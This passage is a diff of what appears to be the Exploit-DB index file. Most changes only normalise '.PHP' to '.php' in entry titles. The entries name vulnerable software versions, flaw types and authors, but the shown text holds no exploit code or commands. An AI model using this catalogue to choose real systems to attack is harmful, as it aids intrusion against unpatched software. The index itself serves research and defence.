SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 print.php Multiple Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 Article.PHP SQL Injection Vulnerability",2005-12-21,r0t3d3Vil,php,webapps,0 +26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 Article.php SQL Injection Vulnerability",2005-12-21,r0t3d3Vil,php,webapps,0 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 Type Parameter SQL Injection Vulnerability",2005-12-22,"Medo HaCKer",php,webapps,0 @@ -24103,7 +24103,7 @@ id,file,description,date,author,platform,type,port 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection Vulnerability",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting Vulnerability",2005-12-29,Lostmon,php,webapps,0 -26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.PHP Cookie Data SQL Injection Vulnerability",2005-12-29,imei,php,webapps,0 +26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.php Cookie Data SQL Injection Vulnerability",2005-12-29,imei,php,webapps,0 26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products SQL Injection Vulnerability",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting Vulnerability",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting Vulnerability",2005-12-30,r0t3d3Vil,php,webapps,0 @@ -24118,7 +24118,7 @@ id,file,description,date,author,platform,type,port 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals PersonalID SQL Injection Vulnerability",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha User Variable SQL Injection Vulnerability",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 Readold Variable SQL Injection Vulnerability",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27633,platforms/php/webapps/27633.txt,"MyBB 1.10 Member.PHP Cross-Site Scripting Vulnerability",2006-04-12,o.y.6,php,webapps,0 +27633,platforms/php/webapps/27633.txt,"MyBB 1.10 Member.php Cross-Site Scripting Vulnerability",2006-04-12,o.y.6,php,webapps,0 27005,platforms/hardware/webapps/27005.txt,"Barracuda LB_ SVF_ WAF & WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27007,platforms/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote Exploit (Metasploit)",2013-07-22,MSJ,windows,remote,21 @@ -24139,13 +24139,13 @@ id,file,description,date,author,platform,type,port 27020,platforms/php/webapps/27020.txt,"Drupal 4.x URL-Encoded Input HTML Injection Vulnerability",2006-01-01,liz0,php,webapps,0 27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 Error Message Cross-Site Scripting Vulnerability",2006-01-02,$um$id,cgi,webapps,0 27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injection Vulnerabilities",2006-01-03,r0t,php,webapps,0 -27023,platforms/php/webapps/27023.txt,"INCOGEN Bugport 1.x Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,php,webapps,0 +27023,platforms/php/webapps/27023.txt,"INCOGEN Bugport 1.x Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,php,webapps,0 27024,platforms/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,windows,remote,0 27025,platforms/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injection Vulnerabilities",2006-01-03,r0t,php,webapps,0 27026,platforms/multiple/dos/27026.txt,"Intel Graphics Accelerator Driver Remote Denial of Service Vulnerability",2006-01-03,"Sumit Siddharth",multiple,dos,0 -27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 Jax_calendar.PHP SQL Injection Vulnerability",2005-12-26,r0t3d3Vil,php,webapps,0 +27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 Jax_calendar.php SQL Injection Vulnerability",2005-12-26,r0t3d3Vil,php,webapps,0 27028,platforms/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0 -27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 Invoices.PHP SQL Injection Vulnerability",2005-12-25,r0t3d3Vil,php,webapps,0 +27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 Invoices.php SQL Injection Vulnerability",2005-12-25,r0t3d3Vil,php,webapps,0 27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0 27031,platforms/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service Vulnerability",2006-01-04,"Doug Chapman",linux,dos,0 27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability",2006-01-05,"Patrice Fournier",linux,remote,0 @@ -24156,11 +24156,11 @@ id,file,description,date,author,platform,type,port 27037,platforms/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities",2013-07-23,Vulnerability-Lab,php,webapps,0 -27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 Index.PHP Cross-Site Scripting Vulnerability",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 +27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 Index.php Cross-Site Scripting Vulnerability",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 Information Disclosure Vulnerability",2006-03-04,Retard,php,webapps,0 27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 index.php page Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 dv_gbook.php f Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 -27360,platforms/php/webapps/27360.txt,"RunCMS 1.x Bigshow.PHP Cross-Site Scripting Vulnerability",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 +27360,platforms/php/webapps/27360.txt,"RunCMS 1.x Bigshow.php Cross-Site Scripting Vulnerability",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 27041,platforms/windows/local/27041.pl,"Super Player 3500 - (.m3u) Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 @@ -24172,8 +24172,8 @@ id,file,description,date,author,platform,type,port 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow Vulnerability",2013-07-23,"Core Security",windows,dos,0 27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite Vulnerability (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 -27052,platforms/php/webapps/27052.txt,"427BB 2.2 Showthread.PHP SQL Injection Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27052,platforms/php/webapps/27052.txt,"427BB 2.2 Showthread.php SQL Injection Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27053,platforms/php/webapps/27053.txt,"Venom Board Post.php3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 @@ -24184,67 +24184,67 @@ id,file,description,date,author,platform,type,port 27061,platforms/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps,0 27062,platforms/cgi/webapps/27062.txt,"Hummingbird Collaboration Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",cgi,webapps,0 27063,platforms/asp/webapps/27063.txt,"WebWiz Forums Search_form.ASP Cross-Site Scripting Vulnerability",2006-01-10,nukedx,asp,webapps,0 -27064,platforms/php/webapps/27064.txt,"Orjinweb Index.PHP Remote File Include Vulnerability",2006-01-10,serxwebun,php,webapps,0 +27064,platforms/php/webapps/27064.txt,"Orjinweb Index.php Remote File Include Vulnerability",2006-01-10,serxwebun,php,webapps,0 27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu -c Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27067,platforms/php/webapps/27067.txt,"MyPHPim calendar.php3 cal_id Parameter SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27068,platforms/php/webapps/27068.txt,"MyPHPim Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x PictureViewer JPEG/PICT File Buffer Overflow Vulnerability",2006-01-11,"Dennis Rand",windows,dos,0 -27070,platforms/php/webapps/27070.txt,"Interspire TrackPoint NX Index.PHP Cross-Site Scripting Vulnerability",2006-01-12,"M.Neset KABAKLI",php,webapps,0 +27070,platforms/php/webapps/27070.txt,"Interspire TrackPoint NX Index.php Cross-Site Scripting Vulnerability",2006-01-12,"M.Neset KABAKLI",php,webapps,0 27071,platforms/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 Default.ASP Cross-Site Scripting Vulnerability",2006-01-12,"M.Neset KABAKLI",asp,webapps,0 27072,platforms/windows/remote/27072.pl,"Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (1)",2006-01-12,anonymous,windows,remote,0 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (2)",2006-01-12,priestmaster,windows,remote,0 27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script SQL Injection Vulnerabilities",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 27077,platforms/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps,0 -27078,platforms/php/webapps/27078.txt,"AlstraSoft Template Seller Pro 3.25 Fullview.PHP Cross-Site Scripting Vulnerability",2006-01-13,night_warrior771,php,webapps,0 +27078,platforms/php/webapps/27078.txt,"AlstraSoft Template Seller Pro 3.25 Fullview.php Cross-Site Scripting Vulnerability",2006-01-13,night_warrior771,php,webapps,0 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 ForgotPassword.ASP Cross-Site Scripting Vulnerability",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 PHP Script Code Execution Vulnerability",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 Item.PL Cross-Site Scripting Vulnerability",2006-01-14,querkopf,cgi,webapps,0 27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 Malformed IMG and XML Parsing Denial of Service Vulnerability",2006-01-16,"Inge Henriksen",windows,dos,0 27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 -27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 Index.PHP SQL Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 AddComment.PHP HTML Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27086,platforms/php/webapps/27086.txt,"White Album 2.5 Pictures.PHP SQL Injection Vulnerability",2006-01-16,liz0,php,webapps,0 -27087,platforms/php/webapps/27087.txt,"GeoBlog 1.0 ViewCat.PHP SQL Injection Vulnerability",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 +27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 Index.php SQL Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 +27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 AddComment.php HTML Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 +27086,platforms/php/webapps/27086.txt,"White Album 2.5 Pictures.php SQL Injection Vulnerability",2006-01-16,liz0,php,webapps,0 +27087,platforms/php/webapps/27087.txt,"GeoBlog 1.0 ViewCat.php SQL Injection Vulnerability",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27088,platforms/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,cgi,webapps,0 27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n SIP Header Data Remote Buffer Overflow Vulnerability (1)",2006-01-11,ZwelL,windows,dos,0 27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n SIP Header Data Remote Buffer Overflow Vulnerability (2)",2006-01-15,ZwelL,windows,dos,0 27091,platforms/cgi/webapps/27091.txt,"Ultimate Auction 3.67 ItemList.PL Cross-Site Scripting Vulnerability",2006-01-16,querkopf,cgi,webapps,0 27092,platforms/php/webapps/27092.txt,"GTP iCommerce Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps,0 -27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 +27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 Index.php Cross-Site Scripting Vulnerability",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 Bluetooth Stack Object Push Buffer Overflow Vulnerability",2006-01-16,"Kevin Finisterre",multiple,dos,0 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter XSS",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 Error Page XSS",2006-01-16,"Oliver Karow",multiple,remote,0 -27097,platforms/php/webapps/27097.txt,"phpXplorer 0.9.33 Workspaces.PHP Directory Traversal Vulnerability",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 +27097,platforms/php/webapps/27097.txt,"phpXplorer 0.9.33 Workspaces.php Directory Traversal Vulnerability",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting Vulnerability",2006-01-16,Preddy,php,webapps,0 -27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 Index.PHP SQL Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27100,platforms/php/webapps/27100.txt,"microBlog 2.0 Index.PHP Multiple SQL Injection Vulnerabilities",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 Index.php SQL Injection Vulnerability",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 +27100,platforms/php/webapps/27100.txt,"microBlog 2.0 Index.php Multiple SQL Injection Vulnerabilities",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27101,platforms/windows/dos/27101.txt,"Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service Vulnerability",2006-01-17,Karma,windows,dos,0 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 index.php search Parameter XSS",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter XSS",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 url BBcode XSS",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 login.php username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27107,platforms/php/webapps/27107.txt,"phpXplorer 0.9.33 Action.PHP Directory Traversal Vulnerability",2006-01-16,liz0,php,webapps,0 +27107,platforms/php/webapps/27107.txt,"phpXplorer 0.9.33 Action.php Directory Traversal Vulnerability",2006-01-16,liz0,php,webapps,0 27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 DHCP Options Remote Buffer Overflow Vulnerability",2006-01-07,"Luigi Auriemma",multiple,dos,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 BBCode IMG Tag Script Injection Vulnerability",2005-12-28,"kurdish hackers team",php,webapps,0 27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 topic.php message Parameter XSS",2006-01-18,alex@evuln.com,php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 27113,platforms/windows/dos/27113.c,"BitComet 0.60 Torrent File Handling Remote Buffer Overflow Vulnerability",2006-01-19,"Dejun Meng",windows,dos,0 -27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 Login.PHP SQL Injection Vulnerability",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 +27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 Login.php SQL Injection Vulnerability",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 HTTP Mail Management Cross-Site Scripting Vulnerability",2006-01-20,"OS2A BTO",cgi,webapps,0 -27116,platforms/php/webapps/27116.txt,"NewsPHP Index.PHP Multiple SQL Injection Vulnerabilities",2006-01-23,SAUDI,php,webapps,0 +27116,platforms/php/webapps/27116.txt,"NewsPHP Index.php Multiple SQL Injection Vulnerabilities",2006-01-23,SAUDI,php,webapps,0 27117,platforms/php/webapps/27117.txt,"BlogPHP 1.2 - Multiple SQL Injection Vulnerabilities",2006-01-20,imei,php,webapps,0 -27118,platforms/php/webapps/27118.pl,"RCBlog 1.0.3 Index.PHP Directory Traversal Vulnerability",2006-01-20,"Aliaksandr Hartsuyeu",php,webapps,0 +27118,platforms/php/webapps/27118.pl,"RCBlog 1.0.3 Index.php Directory Traversal Vulnerability",2006-01-20,"Aliaksandr Hartsuyeu",php,webapps,0 27119,platforms/php/webapps/27119.txt,"e-moBLOG 1.3 - Multiple SQL Injection Vulnerabilities",2006-01-23,"Aliaksandr Hartsuyeu",php,webapps,0 -27120,platforms/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 Post.PHP HTML Injection Vulnerabilities",2006-01-23,"Roozbeh Afrasiabi",php,webapps,0 +27120,platforms/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 Post.php HTML Injection Vulnerabilities",2006-01-23,"Roozbeh Afrasiabi",php,webapps,0 27121,platforms/php/webapps/27121.txt,"123 Flash Chat 5.0 - Remote Code Injection Weakness",2006-01-24,"Jesus Olmos Gonzalez",php,webapps,0 -27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 Notepad UserCP.PHP HTML Injection Vulnerability",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 +27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 Notepad UserCP.php HTML Injection Vulnerability",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 27123,platforms/php/webapps/27123.txt,"Pixelpost 1.4.3 User Comment HTML Injection Vulnerability",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 -27124,platforms/php/webapps/27124.txt,"SleeperChat 0.3f Index.PHP Cross-Site Scripting Vulnerability",2006-01-24,hackologie,php,webapps,0 -27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 Login.PHP SQL Injection Vulnerability",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 +27124,platforms/php/webapps/27124.txt,"SleeperChat 0.3f Index.php Cross-Site Scripting Vulnerability",2006-01-24,hackologie,php,webapps,0 +27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 Login.php SQL Injection Vulnerability",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27126,platforms/php/webapps/27126.txt,"CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps,0 27127,platforms/php/webapps/27127.txt,"PMachine ExpressionEngine 1.4.1 HTTP Referrer HTML Injection Vulnerability",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps,0 27128,platforms/php/webapps/27128.txt,"Windu CMS 2.2 - Multiple Vulnerabilities",2013-07-27,LiquidWorm,php,webapps,0 @@ -24257,7 +24257,7 @@ id,file,description,date,author,platform,type,port 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,metasploit,multiple,remote,8080 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 -27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.PHP SQL Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 +27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.php SQL Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products BBCode Link Tag Script Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27140,platforms/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service Vulnerability",2006-01-26,"Maciek Wierciski",multiple,dos,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 @@ -24265,36 +24265,36 @@ id,file,description,date,author,platform,type,port 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 Forum.ASP Multiple SQL Injection Vulnerabilities",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 Server LDAP Denial of Service Vulnerability",2006-01-28,"Evgeny Legerov",linux,dos,0 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x Inline XML File Attachment Buffer Overflow Vulnerability",2006-01-28,"Mike Davis",linux,dos,0 -27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - Modules.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 +27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - Modules.php Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 -27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 Index.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 +27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 Index.php Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting Vulnerability",2006-01-30,0o_zeus_o0,php,webapps,0 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting Vulnerability",2006-01-30,"Chris Thomas",linux,remote,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 Userlogin.ASP SQL Injection Vulnerability",2006-01-30,preben@watchcom.no,asp,webapps,0 -27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 -27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 Clients.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 -27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 Loginout.PHP Remote File Include Vulnerability",2006-01-31,"Hamid Ebadi",php,webapps,0 -27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 Index.PHP Referrer Cookie SQL Injection Vulnerability",2006-01-31,Devil-00,php,webapps,0 +27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.php Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 +27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 Clients.php Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 +27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 Loginout.php Remote File Include Vulnerability",2006-01-31,"Hamid Ebadi",php,webapps,0 +27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 Index.php Referrer Cookie SQL Injection Vulnerability",2006-01-31,Devil-00,php,webapps,0 27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 Username Parameter SQL Injection Vulnerability",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injection Vulnerabilities",2006-02-01,Siegfried,php,webapps,0 -27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 Index.PHP3 - Cross-Site Scripting Vulnerability",2006-02-01,Siegfried,php,webapps,0 +27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 Index.php3 - Cross-Site Scripting Vulnerability",2006-02-01,Siegfried,php,webapps,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow Vulnerability",2006-02-01,"Adam Zabrocki",multiple,dos,0 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 27162,platforms/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",php,webapps,0 27163,platforms/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin Directory Traversal Vulnerability",2006-02-04,"Timothy D. Morgan",cgi,webapps,0 -27164,platforms/php/webapps/27164.txt,"UBB.Threads 6.3 